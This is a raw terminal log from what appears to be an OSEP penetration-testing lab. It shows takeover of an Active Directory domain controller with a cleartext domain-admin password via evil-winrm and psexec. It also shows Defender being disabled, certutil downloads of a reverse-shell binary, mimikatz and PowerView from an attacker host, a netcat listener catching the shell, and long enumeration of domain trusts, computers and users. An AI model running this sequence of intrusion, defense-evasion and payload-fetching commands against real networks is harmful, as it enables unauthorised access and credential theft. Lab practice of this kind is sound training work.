pete is a domain admin of the ops.comply.com domain:

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ evil-winrm -u ops.comply.com\\pete -p '0998ASDaas2' -i 172.16.64.165

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                               

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\pete\Documents> cd c:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more proof.txt
68032d41ce0f31dd5a2b96031dad9936

*Evil-WinRM* PS C:\Users\Administrator\Desktop> hostname
cdc07
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.64.165
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.64.254
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
ops\pete

Add a record to /etc/hosts: 172.16.64.165 cdc07.ops.comply.com

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ impacket-psexec ops.comply.com/pete:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] [Errno Connection error (cdc07.ops.comply.com:445)] [Errno -2] Name or service not known
                                                                                                                   
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ impacket-psexec ops.comply.com/pete:[email protected]                                       1 ⨯
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on cdc07.ops.comply.com.....
[*] Found writable share ADMIN$
[*] Uploading file zoqGBUWQ.exe
[*] Opening SVCManager on cdc07.ops.comply.com.....
[*] Creating service aemM on cdc07.ops.comply.com.....
[*] Starting service aemM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
cdc07

C:\Windows\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

C:\Windows\system32> cd c:\Users\Administrator\Desktop
 
c:\Users\Administrator\Desktop> more proof.txt
68032d41ce0f31dd5a2b96031dad9936
 
c:\Users\Administrator\Desktop> certutil.exe -urlcache -f http://192.168.49.64/rev.exe rev.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Users\Administrator\Desktop> certutil.exe -urlcache -f http://192.168.49.64/mimikatz.exe mimikatz.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Users\Administrator\Desktop> certutil.exe -urlcache -f http://192.168.49.64/PowerView.ps1 PowerView.ps1
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Users\Administrator\Desktop>

c:\Users\Administrator\Desktop> rev.exe
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 62548
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\Users\Administrator\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Desktop> Import-Module .\PowerView.ps1
Import-Module .\PowerView.ps1
PS C:\Users\Administrator\Desktop> Get-DomainTrust
Get-DomainTrust

SourceName      : ops.comply.com
TargetName      : comply.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 7/15/2020 8:42:49 PM
WhenChanged     : 8/1/2022 8:08:03 AM

PS C:\Users\Administrator\Desktop> Get-DomainComputer -Domain comply.com
Get-DomainComputer -Domain comply.com

pwdlastset                    : 8/1/2022 12:52:44 AM
logoncount                    : 62
msds-generationid             : {84, 58, 56, 226...}
serverreferencebl             : CN=RDC02,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=comply,DC=c
                                om
badpasswordtime               : 12/31/1600 4:00:00 PM
useraccountcontrol            : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
distinguishedname             : CN=RDC02,OU=Domain Controllers,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 8/1/2022 12:52:44 AM
name                          : RDC02
objectsid                     : S-1-5-21-1135011135-3178090508-3151492220-1000
samaccountname                : RDC02$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
accountexpires                : NEVER
cn                            : RDC02
whenchanged                   : 8/1/2022 7:52:44 AM
instancetype                  : 4
msdfsr-computerreferencebl    : CN=RDC02,CN=Topology,CN=Domain System 
                                Volume,CN=DFSR-GlobalSettings,CN=System,DC=comply,DC=com
objectguid                    : d83c0809-c0f1-41cd-bad6-0370f276467e
operatingsystem               : Windows Server 2019 Standard
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:25:47 PM, 1/1/1601 12:00:01 AM}
serviceprincipalname          : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/rdc02.comply.com, TERMSRV/RDC02, 
                                TERMSRV/rdc02.comply.com, ldap/rdc02.comply.com/ForestDnsZones.comply.com...}
usncreated                    : 12293
lastlogon                     : 8/1/2022 12:52:52 AM
badpwdcount                   : 0
msds-supportedencryptiontypes : 28
whencreated                   : 7/15/2020 8:25:47 PM
countrycode                   : 0
primarygroupid                : 516
iscriticalsystemobject        : True
usnchanged                    : 69695
ridsetreferences              : CN=RID Set,CN=RDC02,OU=Domain Controllers,DC=comply,DC=com
dnshostname                   : rdc02.comply.com

PS C:\Users\Administrator\Desktop> Get-DomainComputer
Get-DomainComputer

pwdlastset                    : 8/1/2022 12:53:03 AM
logoncount                    : 62
msds-generationid             : {124, 50, 90, 250...}
serverreferencebl             : CN=CDC07,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=comply,DC=c
                                om
badpasswordtime               : 12/31/1600 4:00:00 PM
useraccountcontrol            : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
distinguishedname             : CN=CDC07,OU=Domain Controllers,DC=ops,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 8/1/2022 12:53:03 AM
name                          : CDC07
objectsid                     : S-1-5-21-2032401531-514583578-4118054891-1000
samaccountname                : CDC07$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
accountexpires                : NEVER
cn                            : CDC07
whenchanged                   : 8/1/2022 7:53:03 AM
instancetype                  : 4
msdfsr-computerreferencebl    : CN=CDC07,CN=Topology,CN=Domain System 
                                Volume,CN=DFSR-GlobalSettings,CN=System,DC=ops,DC=comply,DC=com
objectguid                    : 5de4c373-8239-4cf3-afff-1a21c41656cf
operatingsystem               : Windows Server 2019 Standard
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
serviceprincipalname          : {ldap/cdc07.ops.comply.com/DomainDnsZones.ops.comply.com, 
                                ldap/cdc07.ops.comply.com/ForestDnsZones.comply.com, 
                                Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/cdc07.ops.comply.com, TERMSRV/CDC07...}
usncreated                    : 12293
lastlogon                     : 8/1/2022 12:53:15 AM
badpwdcount                   : 0
msds-supportedencryptiontypes : 28
whencreated                   : 7/15/2020 8:43:38 PM
countrycode                   : 0
primarygroupid                : 516
iscriticalsystemobject        : True
usnchanged                    : 69696
ridsetreferences              : CN=RID Set,CN=CDC07,OU=Domain Controllers,DC=ops,DC=comply,DC=com
dnshostname                   : cdc07.ops.comply.com

pwdlastset                    : 8/1/2022 12:55:06 AM
logoncount                    : 63
badpasswordtime               : 8/1/2022 12:54:46 AM
distinguishedname             : CN=PROXY01,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 8/1/2022 12:55:06 AM
name                          : PROXY01
objectsid                     : S-1-5-21-2032401531-514583578-4118054891-1105
samaccountname                : PROXY01$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
accountexpires                : NEVER
cn                            : PROXY01
whenchanged                   : 8/1/2022 7:55:06 AM
instancetype                  : 4
usncreated                    : 13105
objectguid                    : 8d4f1889-8fb9-4593-8b8b-2176029a5d0d
operatingsystem               : Windows Server 2019 Standard
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/16/2020 6:43:32 AM, 7/15/2020 9:41:16 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname          : {WSMAN/proxy01, WSMAN/proxy01.ops.comply.com, TERMSRV/PROXY01, 
                                TERMSRV/proxy01.ops.comply.com...}
lastlogon                     : 8/1/2022 2:31:39 AM
badpwdcount                   : 0
useraccountcontrol            : WORKSTATION_TRUST_ACCOUNT
whencreated                   : 7/15/2020 9:28:20 PM
countrycode                   : 0
primarygroupid                : 515
iscriticalsystemobject        : False
msds-supportedencryptiontypes : 28
usnchanged                    : 69762
dnshostname                   : proxy01.ops.comply.com

pwdlastset                               : 8/1/2022 1:08:48 AM
logoncount                               : 72
badpasswordtime                          : 12/31/1600 4:00:00 PM
distinguishedname                        : CN=JUMP09,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass                              : {top, person, organizationalPerson, user...}
lastlogontimestamp                       : 8/1/2022 12:53:49 AM
name                                     : JUMP09
objectsid                                : S-1-5-21-2032401531-514583578-4118054891-1106
samaccountname                           : JUMP09$
localpolicyflags                         : 0
codepage                                 : 0
samaccounttype                           : MACHINE_ACCOUNT
accountexpires                           : NEVER
cn                                       : JUMP09
whenchanged                              : 8/1/2022 8:14:48 AM
instancetype                             : 4
usncreated                               : 13129
objectguid                               : 09e4b024-6ae9-4e2e-9326-85acd9d7a298
operatingsystem                          : Windows Server 2019 Standard
operatingsystemversion                   : 10.0 (17763)
lastlogoff                               : 12/31/1600 4:00:00 PM
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}
objectcategory                           : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata                    : {7/16/2020 6:43:32 AM, 7/15/2020 9:50:12 PM, 7/15/2020 9:41:16 PM, 1/1/1601 
                                           12:00:00 AM}
serviceprincipalname                     : {WSMAN/jump09, WSMAN/jump09.ops.comply.com, TERMSRV/JUMP09, 
                                           TERMSRV/jump09.ops.comply.com...}
lastlogon                                : 8/1/2022 2:23:29 AM
badpwdcount                              : 0
useraccountcontrol                       : WORKSTATION_TRUST_ACCOUNT
whencreated                              : 7/15/2020 9:29:45 PM
countrycode                              : 0
primarygroupid                           : 515
iscriticalsystemobject                   : False
msds-supportedencryptiontypes            : 28
usnchanged                               : 69864
dnshostname                              : jump09.ops.comply.com

pwdlastset                    : 8/1/2022 1:08:46 AM
logoncount                    : 78
badpasswordtime               : 12/31/1600 4:00:00 PM
distinguishedname             : CN=FILE06,OU=OpsFileServers,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 8/1/2022 12:53:46 AM
name                          : FILE06
objectsid                     : S-1-5-21-2032401531-514583578-4118054891-1107
samaccountname                : FILE06$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
accountexpires                : NEVER
cn                            : FILE06
whenchanged                   : 8/1/2022 8:08:46 AM
instancetype                  : 4
usncreated                    : 13152
objectguid                    : b487f763-cbe5-40c8-871e-4a6aab2ec2b3
operatingsystem               : Windows Server 2019 Standard
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/16/2020 6:43:44 AM, 7/16/2020 6:43:32 AM, 7/15/2020 9:41:16 PM, 1/1/1601 12:00:00 
                                AM}
serviceprincipalname          : {TERMSRV/FILE06, TERMSRV/file06.ops.comply.com, WSMAN/file06, 
                                WSMAN/file06.ops.comply.com...}
lastlogon                     : 8/1/2022 2:23:27 AM
badpwdcount                   : 0
useraccountcontrol            : WORKSTATION_TRUST_ACCOUNT
whencreated                   : 7/15/2020 9:30:55 PM
countrycode                   : 0
primarygroupid                : 515
iscriticalsystemobject        : False
msds-supportedencryptiontypes : 28
usnchanged                    : 69832
dnshostname                   : file06.ops.comply.com

pwdlastset             : 8/1/2022 1:13:33 AM
logoncount             : 6
badpasswordtime        : 12/31/1600 4:00:00 PM
distinguishedname      : CN=crack,CN=Computers,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user...}
lastlogontimestamp     : 8/1/2022 1:16:51 AM
name                   : crack
objectsid              : S-1-5-21-2032401531-514583578-4118054891-6101
samaccountname         : crack$
localpolicyflags       : 0
codepage               : 0
samaccounttype         : MACHINE_ACCOUNT
accountexpires         : NEVER
cn                     : crack
whenchanged            : 8/1/2022 8:16:51 AM
instancetype           : 4
usncreated             : 69858
objectguid             : 7490740e-dcbd-4039-9940-1ee0ed62e0bf
lastlogon              : 8/1/2022 1:41:08 AM
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : 1/1/1601 12:00:00 AM
serviceprincipalname   : {RestrictedKrbHost/crack, HOST/crack, RestrictedKrbHost/crack.ops.comply.com, 
                         HOST/crack.ops.comply.com}
ms-ds-creatorsid       : {1, 5, 0, 0...}
badpwdcount            : 0
useraccountcontrol     : WORKSTATION_TRUST_ACCOUNT
whencreated            : 8/1/2022 8:13:33 AM
countrycode            : 0
primarygroupid         : 515
iscriticalsystemobject : False
usnchanged             : 69871
dnshostname            : crack.ops.comply.com

PS C:\Users\Administrator\Desktop> Get-DomainUser
Get-DomainUser

logoncount             : 44
iscriticalsystemobject : True
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 8/1/2022 12:52:55 AM
name                   : Administrator
objectsid              : S-1-5-21-2032401531-514583578-4118054891-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
cn                     : Administrator
whenchanged            : 8/1/2022 7:52:55 AM
instancetype           : 4
usncreated             : 8196
objectguid             : 3667857b-d2e0-45ea-ac5c-4b48a43586cf
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:58:48 PM, 7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain 
                         Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
lastlogon              : 8/1/2022 12:52:57 AM
badpasswordtime        : 9/21/2020 5:40:22 AM
badpwdcount            : 0
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:42:49 PM
countrycode            : 0
primarygroupid         : 513
pwdlastset             : 8/2/2020 10:51:52 AM
usnchanged             : 69689

pwdlastset             : 12/31/1600 4:00:00 PM
logoncount             : 0
badpasswordtime        : 12/31/1600 4:00:00 PM
description            : Built-in account for guest access to the computer/domain
distinguishedname      : CN=Guest,CN=Users,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
name                   : Guest
objectsid              : S-1-5-21-2032401531-514583578-4118054891-501
samaccountname         : Guest
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : NEVER
cn                     : Guest
whenchanged            : 7/15/2020 8:42:49 PM
instancetype           : 4
usncreated             : 8197
objectguid             : 517d1f2a-3a11-4b76-8d64-238f18f5dcc3
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
memberof               : CN=Guests,CN=Builtin,DC=ops,DC=comply,DC=com
lastlogon              : 12/31/1600 4:00:00 PM
badpwdcount            : 0
useraccountcontrol     : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:42:49 PM
countrycode            : 0
primarygroupid         : 514
iscriticalsystemobject : True
usnchanged             : 8197

logoncount                    : 0
iscriticalsystemobject        : True
description                   : Key Distribution Center Service Account
distinguishedname             : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
showinadvancedviewonly        : True
objectsid                     : S-1-5-21-2032401531-514583578-4118054891-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/15/2020 8:58:48 PM
instancetype                  : 4
usncreated                    : 12300
objectguid                    : 387a313b-0a95-45b2-8e7a-c0a21ebdae6e
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname          : kadmin/changepw
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
lastlogon                     : 12/31/1600 4:00:00 PM
badpasswordtime               : 12/31/1600 4:00:00 PM
badpwdcount                   : 0
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated                   : 7/15/2020 8:43:38 PM
countrycode                   : 0
primarygroupid                : 513
pwdlastset                    : 7/15/2020 1:43:38 PM
msds-supportedencryptiontypes : 0
usnchanged                    : 13044

logoncount            : 16
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Pete,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Pete
lastlogontimestamp    : 8/1/2022 2:07:06 AM
userprincipalname     : [email protected]
name                  : Pete
objectsid             : S-1-5-21-2032401531-514583578-4118054891-1104
samaccountname        : pete
admincount            : 1
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Pete
whenchanged           : 8/1/2022 9:07:06 AM
instancetype          : 4
usncreated            : 13078
objectguid            : 8340879d-f78e-48e3-95ad-4e8bb7882379
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 9:58:48 PM, 1/1/1601 12:00:00 AM}
givenname             : Pete
memberof              : CN=Domain Admins,CN=Users,DC=ops,DC=comply,DC=com
lastlogon             : 8/1/2022 2:27:46 AM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 9:18:26 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 2:18:26 PM
usnchanged            : 69944

logoncount            : 4
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Nina
lastlogontimestamp    : 7/15/2020 11:49:19 PM
userprincipalname     : [email protected]
name                  : Nina
objectsid             : S-1-5-21-2032401531-514583578-4118054891-1109
samaccountname        : nina
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Nina
whenchanged           : 7/16/2020 6:49:19 AM
instancetype          : 4
usncreated            : 13717
objectguid            : 627efa6d-1a04-45fb-aea9-614aa0f6c786
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname             : Nina
memberof              : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
lastlogon             : 7/15/2020 11:51:58 PM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/16/2020 6:48:28 AM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 11:48:28 PM
usnchanged            : 13726

PS C:\Users\Administrator\Desktop> Get-DomainUser -Domain comply.com
Get-DomainUser -Domain comply.com

logoncount             : 50
iscriticalsystemobject : True
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 8/1/2022 12:52:38 AM
name                   : Administrator
objectsid              : S-1-5-21-1135011135-3178090508-3151492220-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
cn                     : Administrator
whenchanged            : 8/1/2022 7:52:38 AM
instancetype           : 4
usncreated             : 8196
objectguid             : 208616bc-47bb-42fc-931f-a5ea021c82b6
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:40:57 PM, 7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=comply,DC=com, CN=Domain 
                         Admins,CN=Users,DC=comply,DC=com, CN=Enterprise Admins,CN=Users,DC=comply,DC=com, CN=Schema 
                         Admins,CN=Users,DC=comply,DC=com...}
lastlogon              : 8/1/2022 12:52:39 AM
badpasswordtime        : 11/6/2020 4:44:48 AM
badpwdcount            : 0
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:24:22 PM
countrycode            : 0
primarygroupid         : 513
pwdlastset             : 8/2/2020 10:52:21 AM
usnchanged             : 69689

pwdlastset             : 12/31/1600 4:00:00 PM
logoncount             : 0
badpasswordtime        : 12/31/1600 4:00:00 PM
description            : Built-in account for guest access to the computer/domain
distinguishedname      : CN=Guest,CN=Users,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
name                   : Guest
objectsid              : S-1-5-21-1135011135-3178090508-3151492220-501
samaccountname         : Guest
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : NEVER
cn                     : Guest
whenchanged            : 7/15/2020 8:24:22 PM
instancetype           : 4
usncreated             : 8197
objectguid             : 7b53e4be-388c-4d02-9848-da6302ad67bb
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:25:47 PM, 1/1/1601 12:00:01 AM}
memberof               : CN=Guests,CN=Builtin,DC=comply,DC=com
lastlogon              : 12/31/1600 4:00:00 PM
badpwdcount            : 0
useraccountcontrol     : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:24:22 PM
countrycode            : 0
primarygroupid         : 514
iscriticalsystemobject : True
usnchanged             : 8197

logoncount                    : 0
iscriticalsystemobject        : True
description                   : Key Distribution Center Service Account
distinguishedname             : CN=krbtgt,CN=Users,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
showinadvancedviewonly        : True
objectsid                     : S-1-5-21-1135011135-3178090508-3151492220-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/15/2020 8:40:57 PM
instancetype                  : 4
usncreated                    : 12324
objectguid                    : a8468773-3587-4278-b288-222c30b2a742
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname          : kadmin/changepw
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=comply,DC=com
lastlogon                     : 12/31/1600 4:00:00 PM
badpasswordtime               : 12/31/1600 4:00:00 PM
badpwdcount                   : 0
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated                   : 7/15/2020 8:25:47 PM
countrycode                   : 0
primarygroupid                : 513
pwdlastset                    : 7/15/2020 1:25:47 PM
msds-supportedencryptiontypes : 0
usnchanged                    : 12830

logoncount            : 0
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Nicky,OU=ComAdmins,OU=ComUsers,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Nicky
userprincipalname     : [email protected]
name                  : Nicky
objectsid             : S-1-5-21-1135011135-3178090508-3151492220-1103
samaccountname        : nicky
admincount            : 1
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Nicky
whenchanged           : 7/15/2020 8:40:57 PM
instancetype          : 4
usncreated            : 12798
objectguid            : 42dc1442-d1f9-47ee-b1e3-84024b5e720c
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 1/1/1601 12:00:00 AM}
givenname             : Nicky
memberof              : CN=Enterprise Admins,CN=Users,DC=comply,DC=com
lastlogon             : 12/31/1600 4:00:00 PM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 8:37:23 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 1:37:23 PM
usnchanged            : 12813

PS C:\Users\Administrator\Desktop> Get-DomainUser
 Get-DomainUser 

logoncount             : 44
iscriticalsystemobject : True
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 8/1/2022 12:52:55 AM
name                   : Administrator
objectsid              : S-1-5-21-2032401531-514583578-4118054891-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
cn                     : Administrator
whenchanged            : 8/1/2022 7:52:55 AM
instancetype           : 4
usncreated             : 8196
objectguid             : 3667857b-d2e0-45ea-ac5c-4b48a43586cf
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:58:48 PM, 7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain 
                         Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
lastlogon              : 8/1/2022 12:52:57 AM
badpasswordtime        : 9/21/2020 5:40:22 AM
badpwdcount            : 0
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:42:49 PM
countrycode            : 0
primarygroupid         : 513
pwdlastset             : 8/2/2020 10:51:52 AM
usnchanged             : 69689

pwdlastset             : 12/31/1600 4:00:00 PM
logoncount             : 0
badpasswordtime        : 12/31/1600 4:00:00 PM
description            : Built-in account for guest access to the computer/domain
distinguishedname      : CN=Guest,CN=Users,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
name                   : Guest
objectsid              : S-1-5-21-2032401531-514583578-4118054891-501
samaccountname         : Guest
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : NEVER
cn                     : Guest
whenchanged            : 7/15/2020 8:42:49 PM
instancetype           : 4
usncreated             : 8197
objectguid             : 517d1f2a-3a11-4b76-8d64-238f18f5dcc3
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
memberof               : CN=Guests,CN=Builtin,DC=ops,DC=comply,DC=com
lastlogon              : 12/31/1600 4:00:00 PM
badpwdcount            : 0
useraccountcontrol     : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:42:49 PM
countrycode            : 0
primarygroupid         : 514
